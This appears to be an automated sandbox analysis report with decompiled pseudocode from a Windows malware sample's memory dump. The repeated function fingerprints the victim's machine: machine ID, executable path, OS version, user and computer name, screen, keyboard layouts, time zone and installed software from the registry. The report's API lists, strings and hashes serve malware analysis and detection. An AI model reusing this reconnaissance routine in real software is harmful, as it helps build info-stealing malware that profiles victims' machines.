                                                                                                                                                                                              				_push(0x417630);
                                                                                                                                                                                              				E004065CC( &_v56);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(0x417638);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t142, _v40);
                                                                                                                                                                                              				E004037DC( &_v68, "Screen: ",  *_t142);
                                                                                                                                                                                              				E00403D2C( &_v64, _v68);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
                                                                                                                                                                                              				_push(_v72);
                                                                                                                                                                                              				_push(0x417654);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
                                                                                                                                                                                              				_push(_v76);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t142, _v60);
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("Layouts: ");
                                                                                                                                                                                              				E00416FB8( &_v80, _t142, _t181, _t182);
                                                                                                                                                                                              				_push(_v80);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("LocalTime: ");
                                                                                                                                                                                              				E00417198( &_v84, _t142, _t182);
                                                                                                                                                                                              				_push(_v84);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("Zone: ");
                                                                                                                                                                                              				E00417098( &_v88, _t142, _t181, _t182, _t191);
                                                                                                                                                                                              				_push(_v88);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				E00416748( &_v92, _t142, _t181, _t182);
                                                                                                                                                                                              				_push(_v92);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				E00416B94( &_v96, _t142, _t181, _t182, _t191);
                                                                                                                                                                                              				_push(_v96);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t142);
                                                                                                                                                                                              				_push("[Soft]");
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				E00415F30( &_v100, _t142, _t181, _t182);
                                                                                                                                                                                              				E00403798(_t142, _v100);
                                                                                                                                                                                              				_t173 = 0x4175a8;
                                                                                                                                                                                              				 *[fs:eax] = _t173;
                                                                                                                                                                                              				_push(E00417583);
                                                                                                                                                                                              				E00403508( &_v100, 6);
                                                                                                                                                                                              				E00403B98( &_v76, 2);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B98( &_v64, 4);
                                                                                                                                                                                              				E004034E4( &_v48);
                                                                                                                                                                                              				E00403B98( &_v44, 4);
                                                                                                                                                                                              				E00403508( &_v28, 2);
                                                                                                                                                                                              				E00403B98( &_v20, 2);
                                                                                                                                                                                              				return E00403508( &_v12, 2);
                                                                                                                                                                                              			}



































                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x004172a0
                                                                                                                                                                                              0x004172a4
                                                                                                                                                                                              0x004172a5
                                                                                                                                                                                              0x004172aa
                                                                                                                                                                                              0x004172ad
                                                                                                                                                                                              0x004172b0
                                                                                                                                                                                              0x004172b8
                                                                                                                                                                                              0x004172bd
                                                                                                                                                                                              0x004172c0
                                                                                                                                                                                              0x004172cc
                                                                                                                                                                                              0x004172d1
                                                                                                                                                                                              0x004172d3
                                                                                                                                                                                              0x004172dd
                                                                                                                                                                                              0x004172e2
                                                                                                                                                                                              0x004172e5
                                                                                                                                                                                              0x004172f1
                                                                                                                                                                                              0x004172f6
                                                                                                                                                                                              0x004172f8
                                                                                                                                                                                              0x00417300
                                                                                                                                                                                              0x00417305
                                                                                                                                                                                              0x00417308
                                                                                                                                                                                              0x00417315
                                                                                                                                                                                              0x00417320
                                                                                                                                                                                              0x00417325
                                                                                                                                                                                              0x0041732b
                                                                                                                                                                                              0x00417330
                                                                                                                                                                                              0x00417333
                                                                                                                                                                                              0x0041733b
                                                                                                                                                                                              0x00417340
                                                                                                                                                                                              0x00417343
                                                                                                                                                                                              0x00417350
                                                                                                                                                                                              0x0041735a
                                                                                                                                                                                              0x00417369
                                                                                                                                                                                              0x00417374
                                                                                                                                                                                              0x00417379
                                                                                                                                                                                              0x0041737f
                                                                                                                                                                                              0x00417384
                                                                                                                                                                                              0x00417387
                                                                                                                                                                                              0x0041738f
                                                                                                                                                                                              0x00417394
                                                                                                                                                                                              0x00417397
                                                                                                                                                                                              0x0041739c
                                                                                                                                                                                              0x004173a9
                                                                                                                                                                                              0x004173b3
                                                                                                                                                                                              0x004173c2
                                                                                                                                                                                              0x004173cd
                                                                                                                                                                                              0x004173d2
                                                                                                                                                                                              0x004173df
                                                                                                                                                                                              0x004173e4
                                                                                                                                                                                              0x004173e7
                                                                                                                                                                                              0x004173f6
                                                                                                                                                                                              0x004173fb
                                                                                                                                                                                              0x004173fe
                                                                                                                                                                                              0x0041740b
                                                                                                                                                                                              0x00417415
                                                                                                                                                                                              0x0041741a
                                                                                                                                                                                              0x0041741c
                                                                                                                                                                                              0x00417424
                                                                                                                                                                                              0x00417429
                                                                                                                                                                                              0x0041742c
                                                                                                                                                                                              0x00417438
                                                                                                                                                                                              0x0041743d
                                                                                                                                                                                              0x0041743f
                                                                                                                                                                                              0x00417447
                                                                                                                                                                                              0x0041744c
                                                                                                                                                                                              0x0041744f
                                                                                                                                                                                              0x0041745b
                                                                                                                                                                                              0x00417460
                                                                                                                                                                                              0x00417462
                                                                                                                                                                                              0x0041746a
                                                                                                                                                                                              0x0041746f
                                                                                                                                                                                              0x00417472
                                                                                                                                                                                              0x0041747e
                                                                                                                                                                                              0x00417483
                                                                                                                                                                                              0x00417488
                                                                                                                                                                                              0x0041748d
                                                                                                                                                                                              0x00417490
                                                                                                                                                                                              0x0041749c
                                                                                                                                                                                              0x004174a3
                                                                                                                                                                                              0x004174a8
                                                                                                                                                                                              0x004174ad
                                                                                                                                                                                              0x004174b2
                                                                                                                                                                                              0x004174b5
                                                                                                                                                                                              0x004174ba
                                                                                                                                                                                              0x004174c6
                                                                                                                                                                                              0x004174cd
                                                                                                                                                                                              0x004174d2
                                                                                                                                                                                              0x004174d4
                                                                                                                                                                                              0x004174e5
                                                                                                                                                                                              0x004174ec
                                                                                                                                                                                              0x004174f4
                                                                                                                                                                                              0x004174fe
                                                                                                                                                                                              0x00417505
                                                                                                                                                                                              0x00417508
                                                                                                                                                                                              0x0041750b
                                                                                                                                                                                              0x00417518
                                                                                                                                                                                              0x00417525
                                                                                                                                                                                              0x0041752d
                                                                                                                                                                                              0x0041753a
                                                                                                                                                                                              0x00417542
                                                                                                                                                                                              0x0041754f
                                                                                                                                                                                              0x0041755c
                                                                                                                                                                                              0x00417569
                                                                                                                                                                                              0x0041757b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                              • API String ID: 75899496-943277980
                                                                                                                                                                                              • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                              • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 43%
                                                                                                                                                                                              			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                                                              				intOrPtr* _t141;
                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                              				intOrPtr _t172;
                                                                                                                                                                                              				void* _t180;
                                                                                                                                                                                              				intOrPtr _t183;
                                                                                                                                                                                              				intOrPtr _t184;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t181 = __esi;
                                                                                                                                                                                              				asm("das");
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__edx =  *__edx + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				 *__eax =  *__eax & __eax;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_t59 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				 *_t59 =  *_t59 + _t59;
                                                                                                                                                                                              				_t183 = _t184;
                                                                                                                                                                                              				_t142 = 0xc;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t142 = _t142 - 1;
                                                                                                                                                                                              					_t189 = _t142;
                                                                                                                                                                                              				} while (_t142 != 0);
                                                                                                                                                                                              				_t141 = _t59;
                                                                                                                                                                                              				_push(_t183);
                                                                                                                                                                                              				_push(0x41757c);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t184;
                                                                                                                                                                                              				_push("MachineID :   ");
                                                                                                                                                                                              				E00406C4C( &_v8, _t141, __esi);
                                                                                                                                                                                              				_push(_v8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("EXE_PATH  :   ");
                                                                                                                                                                                              				E00416F88(0,  &_v12);
                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("Windows    :   ");
                                                                                                                                                                                              				E00407A4C( &_v28, _t141, _t180, __esi);
                                                                                                                                                                                              				_push(_v28);
                                                                                                                                                                                              				_push(0x4175f4);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				E00403D2C( &_v20, _v24);
                                                                                                                                                                                              				_push(_v20);
                                                                                                                                                                                              				E004066C0( &_v32, _t189);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				_push(0x4175fc);
                                                                                                                                                                                              				E00406BB4( &_v36);
                                                                                                                                                                                              				_push(_v36);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t141, _v16);
                                                                                                                                                                                              				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
                                                                                                                                                                                              				E00403D2C( &_v44, _v48);
                                                                                                                                                                                              				_push(_v44);
                                                                                                                                                                                              				E00406610( &_v52);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(0x417630);
                                                                                                                                                                                              				E004065CC( &_v56);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(0x417638);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t141, _v40);
                                                                                                                                                                                              				E004037DC( &_v68, "Screen: ",  *_t141);
                                                                                                                                                                                              				E00403D2C( &_v64, _v68);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
                                                                                                                                                                                              				_push(_v72);
                                                                                                                                                                                              				_push(0x417654);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
                                                                                                                                                                                              				_push(_v76);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t141, _v60);
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("Layouts: ");
                                                                                                                                                                                              				E00416FB8( &_v80, _t141, _t180, _t181);
                                                                                                                                                                                              				_push(_v80);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("LocalTime: ");
                                                                                                                                                                                              				E00417198( &_v84, _t141, _t181);
                                                                                                                                                                                              				_push(_v84);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("Zone: ");
                                                                                                                                                                                              				E00417098( &_v88, _t141, _t180, _t181, _t189);
                                                                                                                                                                                              				_push(_v88);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				E00416748( &_v92, _t141, _t180, _t181);
                                                                                                                                                                                              				_push(_v92);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				E00416B94( &_v96, _t141, _t180, _t181, _t189);
                                                                                                                                                                                              				_push(_v96);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t141);
                                                                                                                                                                                              				_push("[Soft]");
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				E00415F30( &_v100, _t141, _t180, _t181);
                                                                                                                                                                                              				E00403798(_t141, _v100);
                                                                                                                                                                                              				_t172 = 0x4175a8;
                                                                                                                                                                                              				 *[fs:eax] = _t172;
                                                                                                                                                                                              				_push(E00417583);
                                                                                                                                                                                              				E00403508( &_v100, 6);
                                                                                                                                                                                              				E00403B98( &_v76, 2);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B98( &_v64, 4);
                                                                                                                                                                                              				E004034E4( &_v48);
                                                                                                                                                                                              				E00403B98( &_v44, 4);
                                                                                                                                                                                              				E00403508( &_v28, 2);
                                                                                                                                                                                              				E00403B98( &_v20, 2);
                                                                                                                                                                                              				return E00403508( &_v12, 2);
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                              			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				intOrPtr* _t140;
                                                                                                                                                                                              				void* _t141;
                                                                                                                                                                                              				intOrPtr _t171;
                                                                                                                                                                                              				intOrPtr _t182;
                                                                                                                                                                                              				intOrPtr _t183;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t180 = __esi;
                                                                                                                                                                                              				_t179 = __edi;
                                                                                                                                                                                              				_t182 = _t183;
                                                                                                                                                                                              				_t141 = 0xc;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t141 = _t141 - 1;
                                                                                                                                                                                              					_t184 = _t141;
                                                                                                                                                                                              				} while (_t141 != 0);
                                                                                                                                                                                              				_t140 = __eax;
                                                                                                                                                                                              				_push(_t182);
                                                                                                                                                                                              				_push(0x41757c);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t183;
                                                                                                                                                                                              				_push("MachineID :   ");
                                                                                                                                                                                              				E00406C4C( &_v8, __eax, __esi);
                                                                                                                                                                                              				_push(_v8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("EXE_PATH  :   ");
                                                                                                                                                                                              				E00416F88(0,  &_v12);
                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("Windows    :   ");
                                                                                                                                                                                              				E00407A4C( &_v28, _t140, __edi, __esi);
                                                                                                                                                                                              				_push(_v28);
                                                                                                                                                                                              				_push(0x4175f4);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				E00403D2C( &_v20, _v24);
                                                                                                                                                                                              				_push(_v20);
                                                                                                                                                                                              				E004066C0( &_v32, _t184);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				_push(0x4175fc);
                                                                                                                                                                                              				E00406BB4( &_v36);
                                                                                                                                                                                              				_push(_v36);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t140, _v16);
                                                                                                                                                                                              				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
                                                                                                                                                                                              				E00403D2C( &_v44, _v48);
                                                                                                                                                                                              				_push(_v44);
                                                                                                                                                                                              				E00406610( &_v52);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(0x417630);
                                                                                                                                                                                              				E004065CC( &_v56);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				_push(0x417638);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t140, _v40);
                                                                                                                                                                                              				E004037DC( &_v68, "Screen: ",  *_t140);
                                                                                                                                                                                              				E00403D2C( &_v64, _v68);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
                                                                                                                                                                                              				_push(_v72);
                                                                                                                                                                                              				_push(0x417654);
                                                                                                                                                                                              				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
                                                                                                                                                                                              				_push(_v76);
                                                                                                                                                                                              				_push(0x417604);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t140, _v60);
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("Layouts: ");
                                                                                                                                                                                              				E00416FB8( &_v80, _t140, __edi, _t180);
                                                                                                                                                                                              				_push(_v80);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("LocalTime: ");
                                                                                                                                                                                              				E00417198( &_v84, _t140, _t180);
                                                                                                                                                                                              				_push(_v84);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("Zone: ");
                                                                                                                                                                                              				E00417098( &_v88, _t140, _t179, _t180, _t184);
                                                                                                                                                                                              				_push(_v88);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				E00416748( &_v92, _t140, _t179, _t180);
                                                                                                                                                                                              				_push(_v92);
                                                                                                                                                                                              				_push(0x4175cc);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				E00416B94( &_v96, _t140, _t179, _t180, _t184);
                                                                                                                                                                                              				_push(_v96);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				_push(0x4175a8);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				_push( *_t140);
                                                                                                                                                                                              				_push("[Soft]");
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				Sleep(1);
                                                                                                                                                                                              				E00415F30( &_v100, _t140, _t179, _t180);
                                                                                                                                                                                              				E00403798(_t140, _v100);
                                                                                                                                                                                              				_t171 = 0x4175a8;
                                                                                                                                                                                              				 *[fs:eax] = _t171;
                                                                                                                                                                                              				_push(E00417583);
                                                                                                                                                                                              				E00403508( &_v100, 6);
                                                                                                                                                                                              				E00403B98( &_v76, 2);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B98( &_v64, 4);
                                                                                                                                                                                              				E004034E4( &_v48);
                                                                                                                                                                                              				E00403B98( &_v44, 4);
                                                                                                                                                                                              				E00403508( &_v28, 2);
                                                                                                                                                                                              				E00403B98( &_v20, 2);
                                                                                                                                                                                              				return E00403508( &_v12, 2);
                                                                                                                                                                                              			}

































                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
